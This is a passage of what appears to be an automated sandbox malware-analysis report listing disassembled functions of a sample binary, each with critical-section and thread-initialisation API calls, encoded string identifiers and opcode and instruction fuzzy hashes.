                        • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                        • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                        • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                        Function 049586E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04958755
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                        • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                        • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                        Function 049580E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04958155
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: G@ZK$[@G_
                        • API String ID: 4132704954-2338778587
                        • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                        • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                        • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                        Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00407899
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$A@K.
                        • API String ID: 2296764815-2457859030
                        • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                        • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                        • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                        Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004079A9
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: @G@K$ZYA.
                        • API String ID: 2296764815-4236202813
                        • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                        • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                        • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                        Function 00406DD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406E39
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: ZF\K$three
                        • API String ID: 2296764815-3094064056
                        • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                        • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                        • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                        Function 04957037 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 049570A0
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: ZF\K$three
                        • API String ID: 4132704954-3094064056
                        • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                        • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                        • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                        Function 04957A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04957B00
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$A@K.
                        • API String ID: 4132704954-2457859030
                        • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                        • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                        • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                        Function 04957BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04957C10
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: @G@K$ZYA.
                        • API String ID: 4132704954-4236202813
                        • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                        • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                        • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                        Function 00406C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 00406C99
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: CGV.$mix
                        • API String ID: 2296764815-1644454629
                        • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                        • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                        • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                        Function 04956EA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                          • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                        • __Init_thread_footer.LIBCMT ref: 04956F00
                          • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                          • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: CGV.$mix
                        • API String ID: 4132704954-1644454629
                        • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction ID: 0ace2dae8a327e575a5f5fe3e1d4c52e27c4eb285322fb79163cc70e8265dc82
                        • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                        • Instruction Fuzzy Hash: 70F096B0F44204DBDB10EFA8F942E5C77E0AB45324FF00175ED06973A0D63479458B59